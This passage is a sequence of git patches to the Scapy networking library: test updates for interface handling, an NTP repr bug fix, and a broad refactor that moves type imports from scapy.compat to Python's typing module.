-IFACES._add_fake_iface("eth0") -IFACES._add_fake_iface("lo") -IFACES._add_fake_iface("scapy0") +conf.ifaces._add_fake_iface("eth0") +conf.ifaces._add_fake_iface("lo") +conf.ifaces._add_fake_iface("scapy0") = Route6 - Route6 flushing conf_iface = conf.iface diff --git a/test/windows.uts b/test/windows.uts index ca7f0e300c3..1d862216920 100644 --- a/test/windows.uts +++ b/test/windows.uts @@ -50,6 +50,7 @@ assert status from scapy.interfaces import get_if_list +print(get_if_list()) assert all(x.startswith(r"\Device\NPF_") for x in get_if_list()) = test pcap_service_stop @@ -69,14 +70,14 @@ assert pcap_service_status()[2] == True @mock.patch("scapy.arch.windows.get_windows_if_list") def _test_autostart_ui(mocked_getiflist): mocked_getiflist.side_effect = lambda: [] - IFACES.reload() - assert all(x.index < 0 for x in IFACES.data.values()) + conf.ifaces.reload() + assert all(x.index < 0 for x in conf.ifaces.data.values()) try: - old_ifaces = IFACES.data.copy() + old_ifaces = conf.ifaces.data.copy() _test_autostart_ui() finally: - IFACES.data = old_ifaces + conf.ifaces.data = old_ifaces ######### Native mode ########### From e65180e048ffdb0284a218b6e5ff6d090d4217bd Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Tue, 18 Apr 2023 12:43:44 +0000 Subject: [PATCH 1018/1632] Make repr(NTPInfoPeer) work TimeStampField.i2repr should convert EDecimals to strings by analogy with FixedPointField.i2repr to make it possible for the "filtoffset" packet list field to assemble its repr. Fixes: ``` Traceback (most recent call last): File "", line 2, in File "scapy/packet.py", line 563, in __repr__ val = f.i2repr(self, fval) ^^^^^^^^^^^^^^^^^^^^ File "scapy/fields.py", line 2042, in i2repr return "[%s]" % ", ".join(self.field.i2repr(pkt, v) for v in x) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ TypeError: sequence item 0: expected str instance, EDecimal found ``` --- scapy/layers/ntp.py | 2 +- test/scapy/layers/ntp.uts | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/scapy/layers/ntp.py b/scapy/layers/ntp.py index 3c99e81ac9b..e7585743294 100644 --- a/scapy/layers/ntp.py +++ b/scapy/layers/ntp.py @@ -76,7 +76,7 @@ def i2repr(self, pkt, val): return "--" val = self.i2h(pkt, val) if val < _NTP_BASETIME: - return val + return str(val) return time.strftime( "%a, %d %b %Y %H:%M:%S +0000", time.gmtime(int(val - _NTP_BASETIME)) diff --git a/test/scapy/layers/ntp.uts b/test/scapy/layers/ntp.uts index cef5f7ed163..a76ce4fe3a9 100644 --- a/test/scapy/layers/ntp.uts +++ b/test/scapy/layers/ntp.uts @@ -466,6 +466,7 @@ assert p.version == 2 assert p.mode == 7 assert p.request_code == 2 assert isinstance(p.data[0], NTPInfoPeer) +repr(p.data[0]) assert p.data[0].dstaddr == "192.168.122.102" assert p.data[0].srcaddr == "192.168.122.101" assert p.data[0].srcport == 123 From 3eb07dc725ae33ac9eacf7a094afe2ceca95ec58 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 24 Apr 2023 21:18:51 +0200 Subject: [PATCH 1019/1632] Use the typing module (Python 3.7+) (#3976) --- scapy/ansmachine.py | 2 +- scapy/arch/__init__.py | 2 +- scapy/arch/common.py | 2 +- scapy/arch/libpcap.py | 2 +- scapy/arch/linux.py | 2 +- scapy/arch/unix.py | 2 +- scapy/arch/windows/__init__.py | 8 +- scapy/arch/windows/native.py | 2 +- scapy/arch/windows/structures.py | 2 +- scapy/as_resolvers.py | 2 +- scapy/asn1/asn1.py | 2 +- scapy/asn1/ber.py | 2 +- scapy/asn1/mib.py | 2 +- scapy/asn1fields.py | 6 +- scapy/asn1packet.py | 2 +- scapy/automaton.py | 7 +- scapy/autorun.py | 2 +- scapy/base_classes.py | 2 +- scapy/compat.py | 147 ++---------------- scapy/config.py | 7 +- scapy/contrib/automotive/bmw/enumerator.py | 6 +- scapy/contrib/automotive/bmw/hsfz.py | 10 +- scapy/contrib/automotive/doip.py | 7 +- scapy/contrib/automotive/ecu.py | 17 +- scapy/contrib/automotive/gm/gmlan_logging.py | 7 +- scapy/contrib/automotive/gm/gmlan_scanner.py | 15 +- scapy/contrib/automotive/gm/gmlanutils.py | 7 +- scapy/contrib/automotive/kwp.py | 6 +- scapy/contrib/automotive/obd/scanner.py | 9 +- .../automotive/scanner/configuration.py | 11 +- .../contrib/automotive/scanner/enumerator.py | 22 ++- scapy/contrib/automotive/scanner/executor.py | 14 +- scapy/contrib/automotive/scanner/graph.py | 12 +- .../automotive/scanner/staged_test_case.py | 13 +- scapy/contrib/automotive/scanner/test_case.py | 16 +- scapy/contrib/automotive/uds.py | 13 +- scapy/contrib/automotive/uds_logging.py | 6 +- scapy/contrib/automotive/uds_scan.py | 20 ++- scapy/contrib/automotive/xcp/scanner.py | 9 +- scapy/contrib/cansocket_native.py | 12 +- scapy/contrib/cansocket_python_can.py | 11 +- scapy/contrib/http2.py | 12 +- scapy/contrib/isotp/isotp_native_socket.py | 10 +- scapy/contrib/isotp/isotp_packet.py | 11 +- scapy/contrib/isotp/isotp_scanner.py | 12 +- scapy/contrib/isotp/isotp_soft_socket.py | 14 +- scapy/contrib/isotp/isotp_utils.py | 14 +- scapy/contrib/postgres.py | 7 +- scapy/contrib/roce.py | 5 +- scapy/contrib/tcpao.py | 6 +- scapy/dadict.py | 2 +- scapy/data.py | 2 +- scapy/error.py | 2 +- scapy/fields.py | 2 +- scapy/interfaces.py | 4 +- scapy/layers/can.py | 17 +- scapy/layers/dns.py | 2 +- scapy/layers/gssapi.py | 3 +- scapy/layers/l2.py | 6 +- scapy/layers/ntlm.py | 3 +- scapy/layers/tls/session.py | 2 +- scapy/main.py | 2 +- scapy/modules/nmap.py | 11 +- scapy/packet.py | 4 +- scapy/pipetool.py | 2 +- scapy/plist.py | 28 +--- scapy/pton_ntop.py | 3 +- scapy/route.py | 2 +- scapy/route6.py | 2 +- scapy/scapypipes.py | 2 +- scapy/sendrecv.py | 2 +- scapy/sessions.py | 2 +- scapy/supersocket.py | 2 +- scapy/themes.py | 2 +- scapy/tools/automotive/isotpscanner.py | 8 +- scapy/utils.py | 18 ++- scapy/utils6.py | 2 +- scapy/volatile.py | 2 +- test/regression.uts | 2 +- test/testsocket.py | 11 +- 80 files changed, 415 insertions(+), 276 deletions(-) diff --git a/scapy/ansmachine.py b/scapy/ansmachine.py index 9400197fc90..ee8b428b52d 100644 --- a/scapy/ansmachine.py +++ b/scapy/ansmachine.py @@ -22,7 +22,7 @@ from scapy.packet import Packet from scapy.plist import PacketList -from scapy.compat import ( +from typing import ( Any, Callable, Dict, diff --git a/scapy/arch/__init__.py b/scapy/arch/__init__.py index 297cfea0cef..d4e1d81a9ad 100644 --- a/scapy/arch/__init__.py +++ b/scapy/arch/__init__.py @@ -25,7 +25,7 @@ from scapy.pton_ntop import inet_pton, inet_ntop # Typing imports -from scapy.compat import ( +from typing import ( Optional, Union, ) diff --git a/scapy/arch/common.py b/scapy/arch/common.py index 25f506432a7..d16d5dea104 100644 --- a/scapy/arch/common.py +++ b/scapy/arch/common.py @@ -17,7 +17,7 @@ # Type imports import scapy -from scapy.compat import ( +from typing import ( Optional, Union, ) diff --git a/scapy/arch/libpcap.py b/scapy/arch/libpcap.py index d19674ffd80..7ac3fcf66fe 100644 --- a/scapy/arch/libpcap.py +++ b/scapy/arch/libpcap.py @@ -37,7 +37,7 @@ import scapy.consts -from scapy.compat import ( +from typing import ( cast, Dict, List, diff --git a/scapy/arch/linux.py b/scapy/arch/linux.py index 91eac378966..793b8eed68b 100644 --- a/scapy/arch/linux.py +++ b/scapy/arch/linux.py @@ -48,7 +48,7 @@ from scapy.supersocket import SuperSocket # Typing imports -from scapy.compat import ( +from typing import ( Any, Callable, Dict, diff --git a/scapy/arch/unix.py b/scapy/arch/unix.py index acd52c8f562..2a1459e0612 100644 --- a/scapy/arch/unix.py +++ b/scapy/arch/unix.py @@ -23,7 +23,7 @@ from scapy.utils6 import in6_isvalid, in6_ismlladdr, in6_ismnladdr # Typing imports -from scapy.compat import ( +from typing import ( List, Optional, Tuple, diff --git a/scapy/arch/windows/__init__.py b/scapy/arch/windows/__init__.py index 808b4fef493..d7716faea19 100755 --- a/scapy/arch/windows/__init__.py +++ b/scapy/arch/windows/__init__.py @@ -39,17 +39,17 @@ from scapy.supersocket import SuperSocket # Typing imports -from scapy.compat import ( - cast, - overload, +from typing import ( Any, Dict, List, - Literal, Optional, Tuple, Union, + cast, + overload, ) +from scapy.compat import Literal conf.use_pcap = True diff --git a/scapy/arch/windows/native.py b/scapy/arch/windows/native.py index 567208986eb..075074fc4eb 100644 --- a/scapy/arch/windows/native.py +++ b/scapy/arch/windows/native.py @@ -58,7 +58,7 @@ from scapy.supersocket import SuperSocket # Typing imports -from scapy.compat import ( +from typing import ( Any, List, Optional, diff --git a/scapy/arch/windows/structures.py b/scapy/arch/windows/structures.py index 6ca05644488..90399d62535 100644 --- a/scapy/arch/windows/structures.py +++ b/scapy/arch/windows/structures.py @@ -25,7 +25,7 @@ from scapy.consts import WINDOWS_XP # Typing imports -from scapy.compat import ( +from typing import ( Any, Dict, List, diff --git a/scapy/as_resolvers.py b/scapy/as_resolvers.py index 1fd007b7b88..a09791f721d 100644 --- a/scapy/as_resolvers.py +++ b/scapy/as_resolvers.py @@ -12,7 +12,7 @@ from scapy.config import conf from scapy.compat import plain_str -from scapy.compat import ( +from typing import ( Any, Optional, Tuple, diff --git a/scapy/asn1/asn1.py b/scapy/asn1/asn1.py index c751e55a780..478ff969c9d 100644 --- a/scapy/asn1/asn1.py +++ b/scapy/asn1/asn1.py @@ -17,7 +17,7 @@ from scapy.utils import Enum_metaclass, EnumElement, binrepr from scapy.compat import plain_str, bytes_encode, chb, orb -from scapy.compat import ( +from typing import ( Any, AnyStr, Dict, diff --git a/scapy/asn1/ber.py b/scapy/asn1/ber.py index a848d898977..58502a224aa 100644 --- a/scapy/asn1/ber.py +++ b/scapy/asn1/ber.py @@ -28,7 +28,7 @@ _ASN1_ERROR, ) -from scapy.compat import ( +from typing import ( Any, AnyStr, Dict, diff --git a/scapy/asn1/mib.py b/scapy/asn1/mib.py index ea1d6ee2870..06d5d01be27 100644 --- a/scapy/asn1/mib.py +++ b/scapy/asn1/mib.py @@ -15,7 +15,7 @@ from scapy.utils import do_graph from scapy.compat import plain_str -from scapy.compat import ( +from typing import ( Any, Dict, List, diff --git a/scapy/asn1fields.py b/scapy/asn1fields.py index 72359e1dbf3..39573f9124d 100644 --- a/scapy/asn1fields.py +++ b/scapy/asn1fields.py @@ -42,7 +42,7 @@ from scapy import packet -from scapy.compat import ( +from typing import ( Any, AnyStr, Callable, @@ -52,13 +52,11 @@ Optional, Tuple, Type, + TypeVar, Union, cast, TYPE_CHECKING, ) -from typing import ( - TypeVar, -) if TYPE_CHECKING: from scapy.asn1packet import ASN1_Packet diff --git a/scapy/asn1packet.py b/scapy/asn1packet.py index de6e4954491..058aecc0edb 100644 --- a/scapy/asn1packet.py +++ b/scapy/asn1packet.py @@ -12,7 +12,7 @@ from scapy.base_classes import Packet_metaclass from scapy.packet import Packet -from scapy.compat import ( +from typing import ( Any, Dict, Tuple, diff --git a/scapy/automaton.py b/scapy/automaton.py index 9f90abb2025..15179e306bb 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -34,10 +34,10 @@ from scapy.packet import Packet from scapy.consts import WINDOWS -from scapy.compat import ( +# Typing imports +from typing import ( Any, Callable, - DecoratorCallable, Deque, Dict, Generic, @@ -52,6 +52,7 @@ Union, cast, ) +from scapy.compat import DecoratorCallable def select_objects(inputs, remain): @@ -173,7 +174,7 @@ def fileno(self): return self.__rd def send(self, obj): - # type: (Union[_T]) -> int + # type: (_T) -> int self.__queue.append(obj) if WINDOWS: self._winset() diff --git a/scapy/autorun.py b/scapy/autorun.py index cd71c29e118..1e5d4b10d26 100644 --- a/scapy/autorun.py +++ b/scapy/autorun.py @@ -21,7 +21,7 @@ from scapy.error import log_scapy, Scapy_Exception from scapy.utils import tex_escape -from scapy.compat import ( +from typing import ( Any, Optional, TextIO, diff --git a/scapy/base_classes.py b/scapy/base_classes.py index f464d0b1239..a85df45d9e9 100644 --- a/scapy/base_classes.py +++ b/scapy/base_classes.py @@ -28,7 +28,7 @@ from scapy.error import Scapy_Exception from scapy.consts import WINDOWS -from scapy.compat import ( +from typing import ( Any, Dict, Generic, diff --git a/scapy/compat.py b/scapy/compat.py index 71ad94c2959..2906022a3ed 100644 --- a/scapy/compat.py +++ b/scapy/compat.py @@ -8,45 +8,26 @@ import base64 import binascii -import collections import struct import sys +from typing import ( + Any, + AnyStr, + Callable, + Optional, + TypeVar, + TYPE_CHECKING, + Union, +) + # Very important: will issue typing errors otherwise __all__ = [ # typing - 'Any', - 'AnyStr', - 'Callable', - 'DefaultDict', - 'Deque', - 'Dict', - 'Generic', - 'IO', - 'Iterable', - 'Iterable', - 'Iterator', - 'List', + 'DecoratorCallable', 'Literal', - 'NewType', - 'NoReturn', - 'Optional', - 'Pattern', - 'Sequence', - 'Set', 'Self', - 'Sized', - 'TextIO', - 'Tuple', - 'Type', - 'TypeVar', - 'Union', 'UserDict', - 'ValuesView', - 'cast', - 'overload', - 'FAKE_TYPING', - 'TYPE_CHECKING', # compat 'base64_bytes', 'bytes_base64', @@ -54,7 +35,6 @@ 'bytes_hex', 'chb', 'hex_bytes', - 'lambda_tuple_converter', 'orb', 'plain_str', 'raw', @@ -64,25 +44,9 @@ # Note: # supporting typing on multiple python versions is a nightmare. -# Since Python 3.7, Generic is a type instead of a metaclass, -# therefore we can't support both at the same time. Our strategy -# is to only use the typing module if the Python version is >= 3.7 -# and use totally fake replacements otherwise. -# HOWEVER, when using the fake ones, to emulate stub Generic -# fields (e.g. _PacketField[str]) we need to add a fake -# __getitem__ to Field_metaclass - -try: - import typing # noqa: F401 - from typing import TYPE_CHECKING - if sys.version_info[0:2] <= (3, 6): - # Generic is messed up before Python 3.7 - # https://github.com/python/typing/issues/449 - raise ImportError - FAKE_TYPING = False -except ImportError: - FAKE_TYPING = True - TYPE_CHECKING = False +# we provide a FakeType class to be able to use types added on +# later Python versions (since we run mypy on 3.11), on older +# ones. # Import or create fake types @@ -110,71 +74,6 @@ def __repr__(self): return _FT(name) -if not FAKE_TYPING: - # Only required if using mypy-lang for static typing - from typing import ( - Any, - AnyStr, - Callable, - DefaultDict, - Deque, - Dict, - Generic, - IO, - Iterable, - Iterator, - List, - NewType, - NoReturn, - Optional, - Pattern, - Sequence, - Set, - Sized, - TextIO, - Tuple, - Type, - TypeVar, - Union, - ValuesView, - cast, - overload, - ) -else: - # Let's be creative and make some fake ones. - def cast(_type, obj): # type: ignore - return obj - - Any = _FakeType("Any") - AnyStr = _FakeType("AnyStr") # type: ignore - Callable = _FakeType("Callable") - DefaultDict = _FakeType("DefaultDict", # type: ignore - collections.defaultdict) - Deque = _FakeType("Deque") # type: ignore - Dict = _FakeType("Dict", dict) # type: ignore - IO = _FakeType("IO") # type: ignore - Iterable = _FakeType("Iterable") # type: ignore - Iterator = _FakeType("Iterator") # type: ignore - List = _FakeType("List", list) # type: ignore - NewType = _FakeType("NewType") # type: ignore - NoReturn = _FakeType("NoReturn") - Optional = _FakeType("Optional") - Pattern = _FakeType("Pattern") # type: ignore - Sequence = _FakeType("Sequence", list) # type: ignore - Set = _FakeType("Set", set) # type: ignore - TextIO = _FakeType("TextIO") # type: ignore - Tuple = _FakeType("Tuple") - Type = _FakeType("Type", type) - TypeVar = _FakeType("TypeVar") # type: ignore - Union = _FakeType("Union") - ValuesView = _FakeType("List", list) # type: ignore - - class Sized: # type: ignore - pass - - overload = lambda x: x - - # Python 3.8 Only if sys.version_info >= (3, 8): from typing import Literal @@ -204,22 +103,6 @@ class Sized: # type: ignore DecoratorCallable = TypeVar("DecoratorCallable", bound=Callable[..., Any]) -def lambda_tuple_converter(func): - # type: (DecoratorCallable) -> DecoratorCallable - """ - Converts a Python 2 function as - lambda (x,y): x + y - In the Python 3 format: - lambda x,y : x + y - """ - if func is not None and func.__code__.co_argcount == 1: - return lambda *args: func( # type: ignore - args[0] if len(args) == 1 else args - ) - else: - return func - - # This is ugly, but we don't want to move raw() out of compat.py # and it makes it much clearer if TYPE_CHECKING: @@ -227,7 +110,7 @@ def lambda_tuple_converter(func): def raw(x): - # type: (Union[Packet]) -> bytes + # type: (Packet) -> bytes """ Builds a packet and returns its bytes representation. This function is and will always be cross-version compatible diff --git a/scapy/config.py b/scapy/config.py index d9a89e6a7ef..2651616fa57 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -25,11 +25,11 @@ from scapy.error import log_scapy, warning, ScapyInvalidPlatformException from scapy.themes import NoTheme, apply_ipython_style -from scapy.compat import ( +# Typing imports +from typing import ( cast, Any, Callable, - DecoratorCallable, Dict, Iterator, List, @@ -43,11 +43,12 @@ TYPE_CHECKING, ) from types import ModuleType +from scapy.compat import DecoratorCallable if TYPE_CHECKING: # Do not import at runtime import scapy.as_resolvers - from scapy.nmap import NmapKnowledgeBase + from scapy.modules.nmap import NmapKnowledgeBase from scapy.packet import Packet from scapy.supersocket import SuperSocket # noqa: F401 import scapy.asn1.asn1 diff --git a/scapy/contrib/automotive/bmw/enumerator.py b/scapy/contrib/automotive/bmw/enumerator.py index 571a9676729..e19aad16c8e 100644 --- a/scapy/contrib/automotive/bmw/enumerator.py +++ b/scapy/contrib/automotive/bmw/enumerator.py @@ -8,12 +8,16 @@ from scapy.packet import Packet -from scapy.compat import Any, Iterable from scapy.contrib.automotive.scanner.enumerator import _AutomotiveTestCaseScanResult # noqa: E501 from scapy.contrib.automotive.uds import UDS from scapy.contrib.automotive.bmw.definitions import DEV_JOB from scapy.contrib.automotive.uds_scan import UDS_Enumerator +from typing import ( + Any, + Iterable, +) + class BMW_DevJobEnumerator(UDS_Enumerator): _description = "Available DevelopmentJobs by Identifier " \ diff --git a/scapy/contrib/automotive/bmw/hsfz.py b/scapy/contrib/automotive/bmw/hsfz.py index dc54804cda4..c177dd620c2 100644 --- a/scapy/contrib/automotive/bmw/hsfz.py +++ b/scapy/contrib/automotive/bmw/hsfz.py @@ -10,7 +10,6 @@ import socket import time -from scapy.compat import Optional, Tuple, Type, Iterable, List, Union from scapy.contrib.automotive import log_automotive from scapy.packet import Packet, bind_layers, bind_bottom_up from scapy.fields import IntField, ShortEnumField, XByteField @@ -19,6 +18,15 @@ from scapy.contrib.automotive.uds import UDS, UDS_TP from scapy.data import MTU +from typing import ( + Optional, + Tuple, + Type, + Iterable, + List, + Union, +) + """ BMW HSFZ (High-Speed-Fahrzeug-Zugang / High-Speed-Car-Access). diff --git a/scapy/contrib/automotive/doip.py b/scapy/contrib/automotive/doip.py index f2edcc716b8..139a603065c 100644 --- a/scapy/contrib/automotive/doip.py +++ b/scapy/contrib/automotive/doip.py @@ -21,7 +21,12 @@ from scapy.layers.inet import TCP, UDP from scapy.contrib.automotive.uds import UDS from scapy.data import MTU -from scapy.compat import Union, Tuple, Optional + +from typing import ( + Union, + Tuple, + Optional, +) class DoIP(Packet): diff --git a/scapy/contrib/automotive/ecu.py b/scapy/contrib/automotive/ecu.py index 56f03edcba4..c2caa769de6 100644 --- a/scapy/contrib/automotive/ecu.py +++ b/scapy/contrib/automotive/ecu.py @@ -15,8 +15,7 @@ from types import GeneratorType from threading import Lock -from scapy.compat import Any, Union, Iterable, Callable, List, Optional, \ - Tuple, Type, cast, Dict, orb +from scapy.compat import orb from scapy.packet import Raw, Packet from scapy.plist import PacketList from scapy.sessions import DefaultSession @@ -24,6 +23,20 @@ from scapy.supersocket import SuperSocket from scapy.error import Scapy_Exception +# Typing imports +from typing import ( + Any, + Union, + Iterable, + Callable, + List, + Optional, + Tuple, + Type, + cast, + Dict, +) + __all__ = ["EcuState", "Ecu", "EcuResponse", "EcuSession", "EcuAnsweringMachine"] diff --git a/scapy/contrib/automotive/gm/gmlan_logging.py b/scapy/contrib/automotive/gm/gmlan_logging.py index d992c6fd987..33fc79c1073 100644 --- a/scapy/contrib/automotive/gm/gmlan_logging.py +++ b/scapy/contrib/automotive/gm/gmlan_logging.py @@ -13,9 +13,14 @@ GMLAN_RDBI, GMLAN_RDBIPR, GMLAN_RDBPI, GMLAN_RDBPIPR, GMLAN_RDBPKTI, \ GMLAN_RFRD, GMLAN_RFRDPR, GMLAN_RMBA, GMLAN_RMBAPR, GMLAN_DDM, GMLAN_DDMPR from scapy.packet import Packet -from scapy.compat import Tuple, Any from scapy.contrib.automotive.ecu import Ecu +# Typing imports +from typing import ( + Any, + Tuple, +) + @Ecu.extend_pkt_with_logging(GMLAN_IDO) def GMLAN_IDO_get_log(self): diff --git a/scapy/contrib/automotive/gm/gmlan_scanner.py b/scapy/contrib/automotive/gm/gmlan_scanner.py index f393704084f..46db962a41b 100644 --- a/scapy/contrib/automotive/gm/gmlan_scanner.py +++ b/scapy/contrib/automotive/gm/gmlan_scanner.py @@ -13,8 +13,7 @@ from collections import defaultdict -from scapy.compat import Optional, List, Type, Any, Tuple, Iterable, Dict, \ - cast, Callable, orb +from scapy.compat import orb from scapy.contrib.automotive import log_automotive from scapy.packet import Packet from scapy.config import conf @@ -42,6 +41,18 @@ # TODO: Refactor this import from scapy.contrib.automotive.gm.gmlan_ecu_states import * # noqa: F401, F403 +# Typing imports +from typing import ( + Optional, + List, + Type, + Any, + Tuple, + Iterable, + Dict, + cast, + Callable, +) __all__ = ["GMLAN_Scanner", "GMLAN_ServiceEnumerator", "GMLAN_RDBIEnumerator", "GMLAN_RDBPIEnumerator", "GMLAN_RMBAEnumerator", diff --git a/scapy/contrib/automotive/gm/gmlanutils.py b/scapy/contrib/automotive/gm/gmlanutils.py index 20e5bb43ef4..370e644ba68 100644 --- a/scapy/contrib/automotive/gm/gmlanutils.py +++ b/scapy/contrib/automotive/gm/gmlanutils.py @@ -9,7 +9,6 @@ import time -from scapy.compat import Optional, cast, Callable from scapy.contrib.automotive import log_automotive from scapy.contrib.automotive.gm.gmlan import GMLAN, GMLAN_SA, GMLAN_RD, \ @@ -20,6 +19,12 @@ from scapy.contrib.isotp import ISOTPSocket from scapy.utils import PeriodicSenderThread +from typing import ( + Optional, + cast, + Callable, +) + __all__ = ["GMLAN_TesterPresentSender", "GMLAN_InitDiagnostics", "GMLAN_GetSecurityAccess", "GMLAN_RequestDownload", "GMLAN_TransferData", "GMLAN_TransferPayload", diff --git a/scapy/contrib/automotive/kwp.py b/scapy/contrib/automotive/kwp.py index 423f1c94770..8914f205b78 100644 --- a/scapy/contrib/automotive/kwp.py +++ b/scapy/contrib/automotive/kwp.py @@ -17,7 +17,11 @@ from scapy.utils import PeriodicSenderThread from scapy.plist import _PacketIterable from scapy.contrib.isotp import ISOTP -from scapy.compat import Dict, Any + +from typing import ( + Dict, + Any, +) try: diff --git a/scapy/contrib/automotive/obd/scanner.py b/scapy/contrib/automotive/obd/scanner.py index 2efac6c0912..00884e5813d 100644 --- a/scapy/contrib/automotive/obd/scanner.py +++ b/scapy/contrib/automotive/obd/scanner.py @@ -10,7 +10,6 @@ import copy -from scapy.compat import List, Type, Any, Iterable from scapy.contrib.automotive.obd.obd import OBD, OBD_S03, OBD_S07, OBD_S0A, \ OBD_S01, OBD_S06, OBD_S08, OBD_S09, OBD_NR, OBD_S02, OBD_S02_Record from scapy.config import conf @@ -25,6 +24,14 @@ from scapy.contrib.automotive.scanner.test_case import AutomotiveTestCaseABC, \ _SocketUnion +# Typing imports +from typing import ( + List, + Type, + Any, + Iterable, +) + class OBD_Enumerator(ServiceEnumerator): _supported_kwargs = copy.copy(ServiceEnumerator._supported_kwargs) diff --git a/scapy/contrib/automotive/scanner/configuration.py b/scapy/contrib/automotive/scanner/configuration.py index 4c4fe944ce1..ecee0db436b 100644 --- a/scapy/contrib/automotive/scanner/configuration.py +++ b/scapy/contrib/automotive/scanner/configuration.py @@ -9,12 +9,21 @@ import inspect from threading import Event -from scapy.compat import Any, Union, List, Type, Set, cast from scapy.contrib.automotive import log_automotive from scapy.contrib.automotive.scanner.graph import Graph from scapy.contrib.automotive.scanner.test_case import AutomotiveTestCaseABC from scapy.contrib.automotive.scanner.staged_test_case import StagedAutomotiveTestCase # noqa: E501 +# Typing imports +from typing import ( + Any, + Union, + List, + Type, + Set, + cast, +) + class AutomotiveTestCaseExecutorConfiguration(object): """ diff --git a/scapy/contrib/automotive/scanner/enumerator.py b/scapy/contrib/automotive/scanner/enumerator.py index 4694f232619..c231b1fa8a8 100644 --- a/scapy/contrib/automotive/scanner/enumerator.py +++ b/scapy/contrib/automotive/scanner/enumerator.py @@ -15,8 +15,7 @@ from itertools import chain from typing import NamedTuple -from scapy.compat import Any, Union, List, Optional, Iterable, \ - Dict, Tuple, Set, Callable, cast, orb +from scapy.compat import orb from scapy.contrib.automotive import log_automotive from scapy.error import Scapy_Exception from scapy.utils import make_lined_table, EDecimal @@ -28,6 +27,20 @@ AutomotiveTestCaseExecutorConfiguration from scapy.contrib.automotive.scanner.graph import _Edge +# Typing imports +from typing import ( + Any, + Union, + List, + Optional, + Iterable, + Dict, + Tuple, + Set, + Callable, + cast, +) + # Definition outside the class ServiceEnumerator to allow pickling _AutomotiveTestCaseScanResult = NamedTuple( "_AutomotiveTestCaseScanResult", @@ -526,7 +539,7 @@ def _show_statistics(self, **kwargs): len(self.results_without_response)) + "\n" s += "Statistics per state\n" - s += make_lined_table(stats, lambda x: x, dump=True, sortx=str, + s += make_lined_table(stats, lambda *x: x, dump=True, sortx=str, sorty=str) or "" return s + "\n" @@ -649,8 +662,9 @@ def _show_negative_response_information(self, **kwargs): def _show_results_information(self, **kwargs): # type: (Any) -> str def _get_table_entry( - tup # type: _AutomotiveTestCaseScanResult + *args: Any ): # type: (...) -> Tuple[str, str, str] + tup = cast(_AutomotiveTestCaseScanResult, args) return self._get_table_entry_x(tup), \ self._get_table_entry_y(tup), \ self._get_table_entry_z(tup) diff --git a/scapy/contrib/automotive/scanner/executor.py b/scapy/contrib/automotive/scanner/executor.py index 99c1a22ab2b..eeec5bd3745 100644 --- a/scapy/contrib/automotive/scanner/executor.py +++ b/scapy/contrib/automotive/scanner/executor.py @@ -11,8 +11,6 @@ from itertools import product -from scapy.compat import Any, Union, List, Optional, \ - Dict, Callable, Type, cast from scapy.contrib.automotive import log_automotive from scapy.contrib.automotive.scanner.graph import Graph from scapy.error import Scapy_Exception @@ -25,6 +23,18 @@ _SocketUnion, _CleanupCallable, StateGenerator, TestCaseGenerator, \ AutomotiveTestCase +# Typing imports +from typing import ( + Any, + Union, + List, + Optional, + Dict, + Callable, + Type, + cast, +) + class AutomotiveTestCaseExecutor(metaclass=abc.ABCMeta): """ diff --git a/scapy/contrib/automotive/scanner/graph.py b/scapy/contrib/automotive/scanner/graph.py index 16b40d00bed..444cd98b759 100644 --- a/scapy/contrib/automotive/scanner/graph.py +++ b/scapy/contrib/automotive/scanner/graph.py @@ -8,10 +8,20 @@ from collections import defaultdict -from scapy.compat import Union, List, Optional, Dict, Tuple, Set, TYPE_CHECKING from scapy.contrib.automotive import log_automotive from scapy.contrib.automotive.ecu import EcuState +# Typing imports +from typing import ( + Union, + List, + Optional, + Dict, + Tuple, + Set, + TYPE_CHECKING, +) + _Edge = Tuple[EcuState, EcuState] if TYPE_CHECKING: diff --git a/scapy/contrib/automotive/scanner/staged_test_case.py b/scapy/contrib/automotive/scanner/staged_test_case.py index 8c7543a16f1..2544793a488 100644 --- a/scapy/contrib/automotive/scanner/staged_test_case.py +++ b/scapy/contrib/automotive/scanner/staged_test_case.py @@ -7,14 +7,23 @@ # scapy.contrib.status = library -from scapy.compat import Any, List, Optional, Dict, Callable, cast, \ - TYPE_CHECKING, Tuple from scapy.contrib.automotive import log_automotive from scapy.contrib.automotive.scanner.graph import _Edge from scapy.contrib.automotive.ecu import EcuState, EcuResponse, Ecu from scapy.contrib.automotive.scanner.test_case import AutomotiveTestCaseABC, \ TestCaseGenerator, StateGenerator, _SocketUnion +# Typing imports +from typing import ( + Any, + List, + Optional, + Dict, + Callable, + cast, + Tuple, + TYPE_CHECKING, +) if TYPE_CHECKING: from scapy.contrib.automotive.scanner.test_case import _TransitionTuple from scapy.contrib.automotive.scanner.configuration import \ diff --git a/scapy/contrib/automotive/scanner/test_case.py b/scapy/contrib/automotive/scanner/test_case.py index a296f753c70..854ee1ca794 100644 --- a/scapy/contrib/automotive/scanner/test_case.py +++ b/scapy/contrib/automotive/scanner/test_case.py @@ -10,8 +10,6 @@ import abc from collections import defaultdict -from scapy.compat import Any, Union, List, Optional, \ - Dict, Tuple, Set, Callable, TYPE_CHECKING from scapy.utils import make_lined_table, SingleConversationSocket from scapy.supersocket import SuperSocket from scapy.contrib.automotive.scanner.graph import _Edge @@ -19,6 +17,18 @@ from scapy.error import Scapy_Exception +# Typing imports +from typing import ( + Any, + Union, + List, + Optional, + Dict, + Tuple, + Set, + Callable, + TYPE_CHECKING, +) if TYPE_CHECKING: from scapy.contrib.automotive.scanner.configuration import AutomotiveTestCaseExecutorConfiguration # noqa: E501 @@ -209,7 +219,7 @@ def _show_state_information(self, **kwargs): completed = [(state, self._state_completed[state]) for state in self.scanned_states] return make_lined_table( - completed, lambda tup: ("Scan state completed", tup[0], tup[1]), + completed, lambda x, y: ("Scan state completed", x, y), dump=True) or "" def show(self, dump=False, filtered=True, verbose=False): diff --git a/scapy/contrib/automotive/uds.py b/scapy/contrib/automotive/uds.py index e6907018e17..0da2c18bef2 100644 --- a/scapy/contrib/automotive/uds.py +++ b/scapy/contrib/automotive/uds.py @@ -6,6 +6,10 @@ # scapy.contrib.description = Unified Diagnostic Service (UDS) # scapy.contrib.status = loads +""" +UDS +""" + import struct 